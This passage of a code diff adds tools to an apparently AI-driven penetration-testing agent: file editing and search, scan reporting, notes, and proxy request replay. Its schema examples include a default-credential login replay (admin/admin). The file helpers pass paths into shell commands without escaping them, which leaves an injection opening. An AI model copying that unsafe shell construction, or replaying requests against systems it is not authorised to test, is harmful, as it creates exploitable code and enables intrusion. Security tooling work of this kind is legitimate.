    for tool_inv in tool_invocations:
        observation_xml, images, tool_should_finish = await _execute_single_tool(
            tool_inv, agent_state, tracer, agent_id
        )
        observation_parts.append(observation_xml)
        all_images.extend(images)
        if tool_should_finish:
            should_agent_finish = True
    if all_images:
        content = [{"type": "text", "text": "Tool Results:\n\n" + "\n\n".join(observation_parts)}]
        content.extend(all_images)
        conversation_history.append({"role": "user", "content": content})
    else:
        observation_content = "Tool Results:\n\n" + "\n\n".join(observation_parts)
        conversation_history.append({"role": "user", "content": observation_content})
    return should_agent_finish
 def extract_screenshot_from_result(result: Any) -> str | None:
    if not isinstance(result, dict):
        return None
    screenshot = result.get("screenshot")
    if isinstance(screenshot, str) and screenshot:
        return screenshot
    return None
 def remove_screenshot_from_result(result: Any) -> Any:
    if not isinstance(result, dict):
        return result
    result_copy = result.copy()
    if "screenshot" in result_copy:
        result_copy["screenshot"] = "[Image data extracted - see attached image]"
    return result_copy
--- a/strix/tools/file_edit/init.py
+++ b/strix/tools/file_edit/init.py
@@ -0,0 +1,4 @@
 from .file_edit_actions import list_files, search_files, str_replace_editor
 __all__ = ["list_files", "search_files", "str_replace_editor"]
--- a/strix/tools/file_edit/file_edit_actions.py
+++ b/strix/tools/file_edit/file_edit_actions.py
@@ -0,0 +1,141 @@
 import json
 import re
 from pathlib import Path
 from typing import Any, cast
 from openhands_aci import file_editor
 from openhands_aci.utils.shell import run_shell_cmd
 from strix.tools.registry import register_tool
 def _parse_file_editor_output(output: str) -> dict[str, Any]:
    try:
        pattern = r"<oh_aci_output_[^>]+>\n(.*?)\n</oh_aci_output_[^>]+>"
        match = re.search(pattern, output, re.DOTALL)
        if match:
            json_str = match.group(1)
            data = json.loads(json_str)
            return cast("dict[str, Any]", data)
        return {"output": output, "error": None}
    except (json.JSONDecodeError, AttributeError):
        return {"output": output, "error": None}
@register_tool
 def str_replace_editor(
    command: str,
    path: str,
    file_text: str | None = None,
    view_range: list[int] | None = None,
    old_str: str | None = None,
    new_str: str | None = None,
    insert_line: int | None = None,
 ) -> dict[str, Any]:
    try:
        path_obj = Path(path)
        if not path_obj.is_absolute():
            path = str(Path("/workspace") / path_obj)
        result = file_editor(
            command=command,
            path=path,
            file_text=file_text,
            view_range=view_range,
            old_str=old_str,
            new_str=new_str,
            insert_line=insert_line,
        )
        parsed = _parse_file_editor_output(result)
        if parsed.get("error"):
            return {"error": parsed["error"]}
        return {"content": parsed.get("output", result)}
    except (OSError, ValueError) as e:
        return {"error": f"Error in {command} operation: {e!s}"}
@register_tool
 def list_files(
    path: str,
    recursive: bool = False,
 ) -> dict[str, Any]:
    try:
        path_obj = Path(path)
        if not path_obj.is_absolute():
            path = str(Path("/workspace") / path_obj)
            path_obj = Path(path)
        if not path_obj.exists():
            return {"error": f"Directory not found: {path}"}
        if not path_obj.is_dir():
            return {"error": f"Path is not a directory: {path}"}
        cmd = f"find '{path}' -type f -o -type d | head -500" if recursive else f"ls -1a '{path}'"
        exit_code, stdout, stderr = run_shell_cmd(cmd)
        if exit_code != 0:
            return {"error": f"Error listing directory: {stderr}"}
        items = stdout.strip().split("\n") if stdout.strip() else []
        files = []
        dirs = []
        for item in items:
            item_path = item if recursive else str(Path(path) / item)
            item_path_obj = Path(item_path)
            if item_path_obj.is_file():
                files.append(item)
            elif item_path_obj.is_dir():
                dirs.append(item)
        return {
            "files": sorted(files),
            "directories": sorted(dirs),
            "total_files": len(files),
            "total_dirs": len(dirs),
            "path": path,
            "recursive": recursive,
        }
    except (OSError, ValueError) as e:
        return {"error": f"Error listing directory: {e!s}"}
@register_tool
 def search_files(
    path: str,
    regex: str,
    file_pattern: str = "*",
 ) -> dict[str, Any]:
    try:
        path_obj = Path(path)
        if not path_obj.is_absolute():
            path = str(Path("/workspace") / path_obj)
        if not Path(path).exists():
            return {"error": f"Directory not found: {path}"}
        escaped_regex = regex.replace("'", "'\"'\"'")
        cmd = f"rg --line-number --glob '{file_pattern}' '{escaped_regex}' '{path}'"
        exit_code, stdout, stderr = run_shell_cmd(cmd)
        if exit_code not in {0, 1}:
            return {"error": f"Error searching files: {stderr}"}
        return {"output": stdout if stdout else "No matches found"}
    except (OSError, ValueError) as e:
        return {"error": f"Error searching files: {e!s}"}
 # ruff: noqa: TRY300
--- a/strix/tools/file_edit/file_edit_actions_schema.xml
+++ b/strix/tools/file_edit/file_edit_actions_schema.xml
@@ -0,0 +1,128 @@
 <tools>
  <tool name="list_files">
    <description>List files and directories within the specified directory.</description>
    <parameters>
      <parameter name="path" type="string" required="true">
        <description>Directory path to list</description>
      </parameter>
      <parameter name="recursive" type="boolean" required="false">
        <description>Whether to list files recursively</description>
      </parameter>
    </parameters>
    <returns type="Dict[str, Any]">
      <description>Response containing: - files: List of files and directories - total_files: Total number of files found - total_dirs: Total number of directories found</description>
    </returns>
    <notes>
  - Lists contents alphabetically
  - Returns maximum 500 results to avoid overwhelming output
    </notes>
    <examples>
  # List directory contents
  <function=list_files>
  <parameter=path>/home/user/project/src</parameter>
  </function>
  # Recursive listing
  <function=list_files>
  <parameter=path>/home/user/project/src</parameter>
  <parameter=recursive>true</parameter>
  </function>
    </examples>
  </tool>
  <tool name="search_files">
    <description>Perform a regex search across files in a directory.</description>
    <parameters>
      <parameter name="path" type="string" required="true">
        <description>Directory path to search</description>
      </parameter>
      <parameter name="regex" type="string" required="true">
        <description>Regular expression pattern to search for</description>
      </parameter>
      <parameter name="file_pattern" type="string" required="false">
        <description>File pattern to filter (e.g., "*.py", "*.js")</description>
      </parameter>
    </parameters>
    <returns type="Dict[str, Any]">
      <description>Response containing: - output: The search results as a string</description>
    </returns>
    <notes>
  - Searches recursively through subdirectories
  - Uses ripgrep for fast searching
    </notes>
    <examples>
  # Search Python files for a pattern
  <function=search_files>
  <parameter=path>/home/user/project/src</parameter>
  <parameter=regex>def\s+process_data</parameter>
  <parameter=file_pattern>*.py</parameter>
  </function>
    </examples>
  </tool>
  <tool name="str_replace_editor">
    <description>A text editor tool for viewing, creating and editing files.</description>
    <parameters>
      <parameter name="command" type="string" required="true">
        <description>Editor command to execute</description>
      </parameter>
      <parameter name="path" type="string" required="true">
        <description>Path to the file to edit</description>
      </parameter>
      <parameter name="file_text" type="string" required="false">
        <description>Required parameter of create command, with the content of the file to be created</description>
      </parameter>
      <parameter name="view_range" type="string" required="false">
        <description>Optional parameter of view command when path points to a file. If none is given, the full file is shown. If provided, the file will be shown in the indicated line number range, e.g. [11, 12] will show lines 11 and 12. Indexing at 1 to start. Setting [start_line, -1] shows all lines from start_line to the end of the file</description>
      </parameter>
      <parameter name="old_str" type="string" required="false">
        <description>Required parameter of str_replace command containing the string in path to replace</description>
      </parameter>
      <parameter name="new_str" type="string" required="false">
        <description>Optional parameter of str_replace command containing the new string (if not given, no string will be added). Required parameter of insert command containing the string to insert</description>
      </parameter>
      <parameter name="insert_line" type="string" required="false">
        <description>Required parameter of insert command. The new_str will be inserted AFTER the line insert_line of path</description>
      </parameter>
    </parameters>
    <returns type="Dict[str, Any]">
      <description>Response containing the result of the operation</description>
    </returns>
    <notes>
  Command details:
  - view: Show file contents, optionally with line range
  - create: Create a new file with given content
  - str_replace: Replace old_str with new_str in file
  - insert: Insert new_str after the specified line number
  - undo_edit: Revert the last edit made to the file
    </notes>
    <examples>
  # View a file
  <function=str_replace_editor>
  <parameter=command>view</parameter>
  <parameter=path>/home/user/project/file.py</parameter>
  </function>
  # Create a file
  <function=str_replace_editor>
  <parameter=command>create</parameter>
  <parameter=path>/home/user/project/new_file.py</parameter>
  <parameter=file_text>print("Hello World")</parameter>
  </function>
  # Replace text in file
  <function=str_replace_editor>
  <parameter=command>str_replace</parameter>
  <parameter=path>/home/user/project/file.py</parameter>
  <parameter=old_str>old_function()</parameter>
  <parameter=new_str>new_function()</parameter>
  </function>
  # Insert text after line 10
  <function=str_replace_editor>
  <parameter=command>insert</parameter>
  <parameter=path>/home/user/project/file.py</parameter>
  <parameter=insert_line>10</parameter>
  <parameter=new_str>print("Inserted line")</parameter>
  </function>
    </examples>
  </tool>
 </tools>
--- a/strix/tools/finish/init.py
+++ b/strix/tools/finish/init.py
@@ -0,0 +1,4 @@
 from .finish_actions import finish_scan
 __all__ = ["finish_scan"]
--- a/strix/tools/finish/finish_actions.py
+++ b/strix/tools/finish/finish_actions.py
@@ -0,0 +1,174 @@
 from typing import Any
 from strix.tools.registry import register_tool
 def _validate_root_agent(agent_state: Any) -> dict[str, Any] | None:
    if (
        agent_state is not None
        and hasattr(agent_state, "parent_id")
        and agent_state.parent_id is not None
    ):
        return {
            "success": False,
            "message": (
                "This tool can only be used by the root/main agent. "
                "Subagents must use agent_finish instead."
            ),
        }
    return None
 def _validate_content(content: str) -> dict[str, Any] | None:
    if not content or not content.strip():
        return {"success": False, "message": "Content cannot be empty"}
    return None
 def _check_active_agents(agent_state: Any = None) -> dict[str, Any] | None:
    try:
        from strix.tools.agents_graph.agents_graph_actions import _agent_graph
        current_agent_id = None
        if agent_state and hasattr(agent_state, "agent_id"):
            current_agent_id = agent_state.agent_id
        running_agents = []
        stopping_agents = []
        for agent_id, node in _agent_graph.get("nodes", {}).items():
            if agent_id == current_agent_id:
                continue
            status = node.get("status", "")
            if status == "running":
                running_agents.append(
                    {
                        "id": agent_id,
                        "name": node.get("name", "Unknown"),
                        "task": node.get("task", "No task description"),
                    }
                )
            elif status == "stopping":
                stopping_agents.append(
                    {
                        "id": agent_id,
                        "name": node.get("name", "Unknown"),
                    }
                )
        if running_agents or stopping_agents:
            message_parts = ["Cannot finish scan while other agents are still active:"]
            if running_agents:
                message_parts.append("\n\nRunning agents:")
                message_parts.extend(
                    [
                        f"  - {agent['name']} ({agent['id']}): {agent['task']}"
                        for agent in running_agents
                    ]
                )
            if stopping_agents:
                message_parts.append("\n\nStopping agents:")
                message_parts.extend(
                    [f"  - {agent['name']} ({agent['id']})" for agent in stopping_agents]
                )
            message_parts.extend(
                [
                    "\n\nSuggested actions:",
                    "1. Use wait_for_message to wait for all agents to complete",
                    "2. Send messages to agents asking them to finish if urgent",
                    "3. Use view_agent_graph to monitor agent status",
                ]
            )
            return {
                "success": False,
                "message": "\n".join(message_parts),
                "active_agents": {
                    "running": len(running_agents),
                    "stopping": len(stopping_agents),
                    "details": {
                        "running": running_agents,
                        "stopping": stopping_agents,
                    },
                },
            }
    except ImportError:
        import logging
        logging.warning("Could not check agent graph status - agents_graph module unavailable")
    return None
 def _finalize_with_tracer(content: str, success: bool) -> dict[str, Any]:
    try:
        from strix.cli.tracer import get_global_tracer
        tracer = get_global_tracer()
        if tracer:
            tracer.set_final_scan_result(
                content=content.strip(),
                success=success,
            )
            return {
                "success": True,
                "scan_completed": True,
                "message": "Scan completed successfully"
                if success
                else "Scan completed with errors",
                "vulnerabilities_found": len(tracer.vulnerability_reports),
            }
        import logging
        logging.warning("Global tracer not available - final scan result not stored")
        return {  # noqa: TRY300
            "success": True,
            "scan_completed": True,
            "message": "Scan completed successfully (not persisted)"
            if success
            else "Scan completed with errors (not persisted)",
            "warning": "Final result could not be persisted - tracer unavailable",
        }
    except ImportError:
        return {
            "success": True,
            "scan_completed": True,
            "message": "Scan completed successfully (not persisted)"
            if success
            else "Scan completed with errors (not persisted)",
            "warning": "Final result could not be persisted - tracer module unavailable",
        }
@register_tool(sandbox_execution=False)
 def finish_scan(
    content: str,
    success: bool = True,
    agent_state: Any = None,
 ) -> dict[str, Any]:
    try:
        validation_error = _validate_root_agent(agent_state)
        if validation_error:
            return validation_error
        validation_error = _validate_content(content)
        if validation_error:
            return validation_error
        active_agents_error = _check_active_agents(agent_state)
        if active_agents_error:
            return active_agents_error
        return _finalize_with_tracer(content, success)
    except (ValueError, TypeError, KeyError) as e:
        return {"success": False, "message": f"Failed to complete scan: {e!s}"}
--- a/strix/tools/finish/finish_actions_schema.xml
+++ b/strix/tools/finish/finish_actions_schema.xml
@@ -0,0 +1,45 @@
 <tools>
  <tool name="finish_scan">
    <description>Complete the main security scan and generate final report.
 IMPORTANT: This tool can ONLY be used by the root/main agent.
 Subagents must use agent_finish from agents_graph tool instead.
 IMPORTANT: This tool will NOT allow finishing if any agents are still running or stopping.
 You must wait for all agents to complete before using this tool.
 This tool MUST be called at the very end of the security assessment to:
 - Verify all agents have completed their tasks
 - Generate the final comprehensive scan report
 - Mark the entire scan as completed
 - Stop the agent from running
 Use this tool when:
 - You are the main/root agent conducting the security assessment
 - ALL subagents have completed their tasks (no agents are "running" or "stopping")
 - You have completed all testing phases
 - You are ready to conclude the entire security assessment
 IMPORTANT: Calling this tool multiple times will OVERWRITE any previous scan report.
 Make sure you include ALL findings and details in a single comprehensive report.
 If agents are still running, this tool will:
 - Show you which agents are still active
 - Suggest using wait_for_message to wait for completion
 - Suggest messaging agents if immediate completion is needed
 Put ALL details in the content - methodology, tools used, vulnerability counts, key findings, recommendations,
 compliance notes, risk assessments, next steps, etc. Be comprehensive and include everything relevant.</description>
    <parameters>
      <parameter name="content" type="string" required="true">
        <description>Complete scan report including executive summary, methodology, findings, vulnerability details, recommendations, compliance notes, risk assessment, and conclusions. Include everything relevant to the assessment.</description>
      </parameter>
      <parameter name="success" type="boolean" required="false">
        <description>Whether the scan completed successfully without critical errors</description>
      </parameter>
    </parameters>
    <returns type="Dict[str, Any]">
      <description>Response containing success status and completion message. If agents are still running, returns details about active agents and suggested actions.</description>
    </returns>
  </tool>
 </tools>
--- a/strix/tools/notes/init.py
+++ b/strix/tools/notes/init.py
@@ -0,0 +1,14 @@
 from .notes_actions import (
    create_note,
    delete_note,
    list_notes,
    update_note,
 )
 __all__ = [
    "create_note",
    "delete_note",
    "list_notes",
    "update_note",
 ]
--- a/strix/tools/notes/notes_actions.py
+++ b/strix/tools/notes/notes_actions.py
@@ -0,0 +1,191 @@
 import uuid
 from datetime import UTC, datetime
 from typing import Any
 from strix.tools.registry import register_tool
 _notes_storage: dict[str, dict[str, Any]] = {}
 def _filter_notes(
    category: str | None = None,
    tags: list[str] | None = None,
    priority: str | None = None,
    search_query: str | None = None,
 ) -> list[dict[str, Any]]:
    filtered_notes = []
    for note_id, note in _notes_storage.items():
        if category and note.get("category") != category:
            continue
        if priority and note.get("priority") != priority:
            continue
        if tags:
            note_tags = note.get("tags", [])
            if not any(tag in note_tags for tag in tags):
                continue
        if search_query:
            search_lower = search_query.lower()
            title_match = search_lower in note.get("title", "").lower()
            content_match = search_lower in note.get("content", "").lower()
            if not (title_match or content_match):
                continue
        note_with_id = note.copy()
        note_with_id["note_id"] = note_id
        filtered_notes.append(note_with_id)
    filtered_notes.sort(key=lambda x: x.get("created_at", ""), reverse=True)
    return filtered_notes
@register_tool
 def create_note(
    title: str,
    content: str,
    category: str = "general",
    tags: list[str] | None = None,
    priority: str = "normal",
 ) -> dict[str, Any]:
    try:
        if not title or not title.strip():
            return {"success": False, "error": "Title cannot be empty", "note_id": None}
        if not content or not content.strip():
            return {"success": False, "error": "Content cannot be empty", "note_id": None}
        valid_categories = ["general", "findings", "methodology", "todo", "questions", "plan"]
        if category not in valid_categories:
            return {
                "success": False,
                "error": f"Invalid category. Must be one of: {', '.join(valid_categories)}",
                "note_id": None,
            }
        valid_priorities = ["low", "normal", "high", "urgent"]
        if priority not in valid_priorities:
            return {
                "success": False,
                "error": f"Invalid priority. Must be one of: {', '.join(valid_priorities)}",
                "note_id": None,
            }
        note_id = str(uuid.uuid4())[:5]
        timestamp = datetime.now(UTC).isoformat()
        note = {
            "title": title.strip(),
            "content": content.strip(),
            "category": category,
            "tags": tags or [],
            "priority": priority,
            "created_at": timestamp,
            "updated_at": timestamp,
        }
        _notes_storage[note_id] = note
    except (ValueError, TypeError) as e:
        return {"success": False, "error": f"Failed to create note: {e}", "note_id": None}
    else:
        return {
            "success": True,
            "note_id": note_id,
            "message": f"Note '{title}' created successfully",
        }
@register_tool
 def list_notes(
    category: str | None = None,
    tags: list[str] | None = None,
    priority: str | None = None,
    search: str | None = None,
 ) -> dict[str, Any]:
    try:
        filtered_notes = _filter_notes(
            category=category, tags=tags, priority=priority, search_query=search
        )
        return {
            "success": True,
            "notes": filtered_notes,
            "total_count": len(filtered_notes),
        }
    except (ValueError, TypeError) as e:
        return {
            "success": False,
            "error": f"Failed to list notes: {e}",
            "notes": [],
            "total_count": 0,
        }
@register_tool
 def update_note(
    note_id: str,
    title: str | None = None,
    content: str | None = None,
    tags: list[str] | None = None,
    priority: str | None = None,
 ) -> dict[str, Any]:
    try:
        if note_id not in _notes_storage:
            return {"success": False, "error": f"Note with ID '{note_id}' not found"}
        note = _notes_storage[note_id]
        if title is not None:
            if not title.strip():
                return {"success": False, "error": "Title cannot be empty"}
            note["title"] = title.strip()
        if content is not None:
            if not content.strip():
                return {"success": False, "error": "Content cannot be empty"}
            note["content"] = content.strip()
        if tags is not None:
            note["tags"] = tags
        if priority is not None:
            valid_priorities = ["low", "normal", "high", "urgent"]
            if priority not in valid_priorities:
                return {
                    "success": False,
                    "error": f"Invalid priority. Must be one of: {', '.join(valid_priorities)}",
                }
            note["priority"] = priority
        note["updated_at"] = datetime.now(UTC).isoformat()
        return {
            "success": True,
            "message": f"Note '{note['title']}' updated successfully",
        }
    except (ValueError, TypeError) as e:
        return {"success": False, "error": f"Failed to update note: {e}"}
@register_tool
 def delete_note(note_id: str) -> dict[str, Any]:
    try:
        if note_id not in _notes_storage:
            return {"success": False, "error": f"Note with ID '{note_id}' not found"}
        note_title = _notes_storage[note_id]["title"]
        del _notes_storage[note_id]
    except (ValueError, TypeError) as e:
        return {"success": False, "error": f"Failed to delete note: {e}"}
    else:
        return {
            "success": True,
            "message": f"Note '{note_title}' deleted successfully",
        }
--- a/strix/tools/notes/notes_actions_schema.xml
+++ b/strix/tools/notes/notes_actions_schema.xml
@@ -0,0 +1,150 @@
 <tools>
  <tool name="create_note">
    <description>Create a personal note for TODOs, side notes, plans, and organizational purposes during
  the scan.</description>
    <details>Use this tool for quick reminders, action items, planning thoughts, and organizational notes
  rather than formal vulnerability reports or detailed findings. This is your personal notepad
  for keeping track of tasks, ideas, and things to remember or follow up on.</details>
    <parameters>
      <parameter name="title" type="string" required="true">
        <description>Title of the note</description>
      </parameter>
      <parameter name="content" type="string" required="true">
        <description>Content of the note</description>
      </parameter>
      <parameter name="category" type="string" required="false">
        <description>Category to organize the note (default: "general", "findings", "methodology", "todo", "questions", "plan")</description>
      </parameter>
      <parameter name="tags" type="string" required="false">
        <description>Tags for categorization</description>
      </parameter>
      <parameter name="priority" type="string" required="false">
        <description>Priority level of the note ("low", "normal", "high", "urgent")</description>
      </parameter>
    </parameters>
    <returns type="Dict[str, Any]">
      <description>Response containing: - note_id: ID of the created note - success: Whether the note was created successfully</description>
    </returns>
    <examples>
  # Create a TODO reminder
  <function=create_note>
  <parameter=title>TODO: Check SSL Certificate Details</parameter>
  <parameter=content>Remember to verify SSL certificate validity and check for weak ciphers
               on the HTTPS service discovered on port 443. Also check for certificate
               transparency logs.</parameter>
  <parameter=category>todo</parameter>
  <parameter=tags>["ssl", "certificate", "followup"]</parameter>
  <parameter=priority>normal</parameter>
  </function>
  # Planning note
  <function=create_note>
  <parameter=title>Scan Strategy Planning</parameter>
  <parameter=content>Plan for next phase: 1) Complete subdomain enumeration 2) Test discovered
               web apps for OWASP Top 10 3) Check database services for default creds
               4) Review any custom applications for business logic flaws</parameter>
  <parameter=category>plan</parameter>
  <parameter=tags>["planning", "strategy", "next_steps"]</parameter>
  </function>
  # Side note for later investigation
  <function=create_note>
  <parameter=title>Interesting Directory Found</parameter>
  <parameter=content>Found /backup/ directory that might contain sensitive files. Low priority
               for now but worth checking if time permits. Directory listing seems
               disabled.</parameter>
  <parameter=category>findings</parameter>
  <parameter=tags>["directory", "backup", "low_priority"]</parameter>
  <parameter=priority>low</parameter>
  </function>
    </examples>
  </tool>
  <tool name="delete_note">
    <description>Delete a note.</description>
    <parameters>
      <parameter name="note_id" type="string" required="true">
        <description>ID of the note to delete</description>
      </parameter>
    </parameters>
    <returns type="Dict[str, Any]">
      <description>Response containing: - success: Whether the note was deleted successfully</description>
    </returns>
    <examples>
  <function=delete_note>
  <parameter=note_id>note_123</parameter>
  </function>
    </examples>
  </tool>
  <tool name="list_notes">
    <description>List existing notes with optional filtering and search.</description>
    <parameters>
      <parameter name="category" type="string" required="false">
        <description>Filter by category</description>
      </parameter>
      <parameter name="tags" type="string" required="false">
        <description>Filter by tags (returns notes with any of these tags)</description>
      </parameter>
      <parameter name="priority" type="string" required="false">
        <description>Filter by priority level</description>
      </parameter>
      <parameter name="search" type="string" required="false">
        <description>Search query to find in note titles and content</description>
      </parameter>
    </parameters>
    <returns type="Dict[str, Any]">
      <description>Response containing: - notes: List of matching notes - total_count: Total number of notes found</description>
    </returns>
    <examples>
  # List all findings
  <function=list_notes>
  <parameter=category>findings</parameter>
  </function>
  # List high priority items
  <function=list_notes>
  <parameter=priority>high</parameter>
  </function>
  # Search for SQL injection related notes
  <function=list_notes>
  <parameter=search>SQL injection</parameter>
  </function>
  # Search within a specific category
  <function=list_notes>
  <parameter=search>admin</parameter>
  <parameter=category>findings</parameter>
  </function>
    </examples>
  </tool>
  <tool name="update_note">
    <description>Update an existing note.</description>
    <parameters>
      <parameter name="note_id" type="string" required="true">
        <description>ID of the note to update</description>
      </parameter>
      <parameter name="title" type="string" required="false">
        <description>New title for the note</description>
      </parameter>
      <parameter name="content" type="string" required="false">
        <description>New content for the note</description>
      </parameter>
      <parameter name="tags" type="string" required="false">
        <description>New tags for the note</description>
      </parameter>
      <parameter name="priority" type="string" required="false">
        <description>New priority level</description>
      </parameter>
    </parameters>
    <returns type="Dict[str, Any]">
      <description>Response containing: - success: Whether the note was updated successfully</description>
    </returns>
    <examples>
  <function=update_note>
  <parameter=note_id>note_123</parameter>
  <parameter=content>Updated content with new findings...</parameter>
  <parameter=priority>urgent</parameter>
  </function>
    </examples>
  </tool>
 </tools>
--- a/strix/tools/proxy/init.py
+++ b/strix/tools/proxy/init.py
@@ -0,0 +1,20 @@
 from .proxy_actions import (
    list_requests,
    list_sitemap,
    repeat_request,
    scope_rules,
    send_request,
    view_request,
    view_sitemap_entry,
 )
 __all__ = [
    "list_requests",
    "list_sitemap",
    "repeat_request",
    "scope_rules",
    "send_request",
    "view_request",
    "view_sitemap_entry",
 ]
--- a/strix/tools/proxy/proxy_actions.py
+++ b/strix/tools/proxy/proxy_actions.py
@@ -0,0 +1,101 @@
 from typing import Any, Literal
 from strix.tools.registry import register_tool
 from .proxy_manager import get_proxy_manager
 RequestPart = Literal["request", "response"]
@register_tool
 def list_requests(
    httpql_filter: str | None = None,
    start_page: int = 1,
    end_page: int = 1,
    page_size: int = 50,
    sort_by: Literal[
        "timestamp",
        "host",
        "method",
        "path",
        "status_code",
        "response_time",
        "response_size",
        "source",
    ] = "timestamp",
    sort_order: Literal["asc", "desc"] = "desc",
    scope_id: str | None = None,
 ) -> dict[str, Any]:
    manager = get_proxy_manager()
    return manager.list_requests(
        httpql_filter, start_page, end_page, page_size, sort_by, sort_order, scope_id
    )
@register_tool
 def view_request(
    request_id: str,
    part: RequestPart = "request",
    search_pattern: str | None = None,
    page: int = 1,
    page_size: int = 50,
 ) -> dict[str, Any]:
    manager = get_proxy_manager()
    return manager.view_request(request_id, part, search_pattern, page, page_size)
@register_tool
 def send_request(
    method: str,
    url: str,
    headers: dict[str, str] | None = None,
    body: str = "",
    timeout: int = 30,
 ) -> dict[str, Any]:
    if headers is None:
        headers = {}
    manager = get_proxy_manager()
    return manager.send_simple_request(method, url, headers, body, timeout)
@register_tool
 def repeat_request(
    request_id: str,
    modifications: dict[str, Any] | None = None,
 ) -> dict[str, Any]:
    if modifications is None:
        modifications = {}
    manager = get_proxy_manager()
    return manager.repeat_request(request_id, modifications)
@register_tool
 def scope_rules(
    action: Literal["get", "list", "create", "update", "delete"],
    allowlist: list[str] | None = None,
    denylist: list[str] | None = None,
    scope_id: str | None = None,
    scope_name: str | None = None,
 ) -> dict[str, Any]:
    manager = get_proxy_manager()
    return manager.scope_rules(action, allowlist, denylist, scope_id, scope_name)
@register_tool
 def list_sitemap(
    scope_id: str | None = None,
    parent_id: str | None = None,
    depth: Literal["DIRECT", "ALL"] = "DIRECT",
    page: int = 1,
 ) -> dict[str, Any]:
    manager = get_proxy_manager()
    return manager.list_sitemap(scope_id, parent_id, depth, page)
@register_tool
 def view_sitemap_entry(
    entry_id: str,
 ) -> dict[str, Any]:
    manager = get_proxy_manager()
    return manager.view_sitemap_entry(entry_id)
--- a/strix/tools/proxy/proxy_actions_schema.xml
+++ b/strix/tools/proxy/proxy_actions_schema.xml
@@ -0,0 +1,267 @@
 <?xml version="1.0" ?>
 <tools>
  <tool name="list_requests">
    <description>List and filter proxy requests using HTTPQL with pagination.</description>
    <parameters>
      <parameter name="httpql_filter" type="string" required="false">
        <description>HTTPQL filter using Caido's syntax:
        Integer fields (port, code, roundtrip, id) - eq, gt, gte, lt, lte, ne:
        - resp.code.eq:200, resp.code.gte:400, req.port.eq:443
        Text/byte fields (ext, host, method, path, query, raw) - regex:
        - req.method.regex:"POST", req.path.regex:"/api/.*", req.host.regex:".*.com"
        Date fields (created_at) - gt, lt with ISO formats:
        - req.created_at.gt:"2024-01-01T00:00:00Z"
        Special: source:intercept, preset:"name"</description>
      </parameter>
      <parameter name="start_page" type="integer" required="false">
        <description>Starting page (1-based)</description>
      </parameter>
      <parameter name="end_page" type="integer" required="false">
        <description>Ending page (1-based, inclusive)</description>
      </parameter>
      <parameter name="page_size" type="integer" required="false">
        <description>Requests per page</description>
      </parameter>
      <parameter name="sort_by" type="string" required="false">
        <description>Sort field from: "timestamp", "host", "status_code", "response_time", "response_size"</description>
      </parameter>
      <parameter name="sort_order" type="string" required="false">
        <description>Sort direction ("asc" or "desc")</description>
      </parameter>
      <parameter name="scope_id" type="string" required="false">
        <description>Scope ID to filter requests (use scope_rules to manage scopes)</description>
      </parameter>
    </parameters>
    <returns type="Dict[str, Any]">
      <description>Response containing:
        - 'requests': Request objects for page range
        - 'total_count': Total matching requests
        - 'start_page', 'end_page', 'page_size': Query parameters
        - 'returned_count': Requests in response</description>
    </returns>
    <examples>
  # POST requests to API with 200 responses
  <function=list_requests>
  <parameter=httpql_filter>req.method.eq:"POST" AND req.path.cont:"/api/"</parameter>
  <parameter=sort_by>response_time</parameter>
  <parameter=scope_id>scope123</parameter>
  </function>
  # Requests within specific scope
  <function=list_requests>
  <parameter=scope_id>scope123</parameter>
  <parameter=sort_by>timestamp</parameter>
  </function>
    </examples>
  </tool>
  <tool name="view_request">
    <description>View request/response data with search and pagination.</description>
    <parameters>
      <parameter name="request_id" type="string" required="true">
        <description>Request ID</description>
      </parameter>
      <parameter name="part" type="string" required="false">
        <description>Which part to return ("request" or "response")</description>
      </parameter>
      <parameter name="search_pattern" type="string" required="false">
        <description>Regex pattern to search content. Common patterns:
        - API endpoints: r"/api/[a-zA-Z0-9._/-]+"
        - URLs: r"https?://[^\\s<>"\']+"
        - Parameters: r'[?&][a-zA-Z0-9_]+=([^&\\s<>"\']+)'
        - Reflections: input_value in content</description>
      </parameter>
      <parameter name="page" type="integer" required="false">
        <description>Page number for pagination</description>
      </parameter>
      <parameter name="page_size" type="integer" required="false">
        <description>Lines per page</description>
      </parameter>
    </parameters>
    <returns type="Dict[str, Any]">
      <description>With search_pattern (COMPACT):
        - 'matches': [{match, before, after, position}] - max 20
        - 'total_matches': Total found
        - 'truncated': If limited to 20
        Without search_pattern (PAGINATION):
        - 'content': Page content
        - 'page': Current page
        - 'showing_lines': Range display
        - 'has_more': More pages available</description>
    </returns>
    <examples>
  # Find API endpoints in response
  <function=view_request>
  <parameter=request_id>123</parameter>
  <parameter=part>response</parameter>
  <parameter=search_pattern>/api/[a-zA-Z0-9._/-]+</parameter>
  </function>
    </examples>
  </tool>
  <tool name="send_request">
    <description>Send a simple HTTP request through proxy.</description>
    <parameters>
      <parameter name="method" type="string" required="true">
        <description>HTTP method (GET, POST, etc.)</description>
      </parameter>
      <parameter name="url" type="string" required="true">
        <description>Target URL</description>
      </parameter>
      <parameter name="headers" type="dict" required="false">
        <description>Headers as {"key": "value"}</description>
      </parameter>
      <parameter name="body" type="string" required="false">
        <description>Request body</description>
      </parameter>
      <parameter name="timeout" type="integer" required="false">
        <description>Request timeout</description>
      </parameter>
    </parameters>
  </tool>
  <tool name="repeat_request">
    <description>Repeat an existing proxy request with modifications for pentesting.
    PROPER WORKFLOW:
    1. Use browser_action to browse the target application
    2. Use list_requests() to see captured proxy traffic
    3. Use repeat_request() to modify and test specific requests
    This mirrors real pentesting: browse → capture → modify → test</description>
    <parameters>
      <parameter name="request_id" type="string" required="true">
        <description>ID of the original request to repeat (from list_requests)</description>
      </parameter>
      <parameter name="modifications" type="dict" required="false">
        <description>Changes to apply to the original request:
        - "url": New URL or modify existing one
        - "params": Dict to update query parameters
        - "headers": Dict to add/update headers
        - "body": New request body (replaces original)
        - "cookies": Dict to add/update cookies</description>
      </parameter>
    </parameters>
    <returns type="Dict[str, Any]">
      <description>Response data with status, headers, body, timing, and request details</description>
    </returns>
    <examples>
  # Modify POST body payload
  <function=repeat_request>
  <parameter=request_id>req_789</parameter>
  <parameter=modifications>{"body": "{\"username\":\"admin\",\"password\":\"admin\"}"}</parameter>
  </function>
    </examples>
  </tool>
  <tool name="scope_rules">
    <description>Manage proxy scope patterns for domain/file filtering using Caido's scope system.</description>
    <parameters>
      <parameter name="action" type="string" required="true">
        <description>Scope action:
        - get: Get specific scope by ID or list all if no ID
        - update: Update existing scope (requires scope_id and scope_name)
        - list: List all available scopes
        - create: Create new scope (requires scope_name)
        - delete: Delete scope (requires scope_id)</description>
      </parameter>
      <parameter name="allowlist" type="list" required="false">
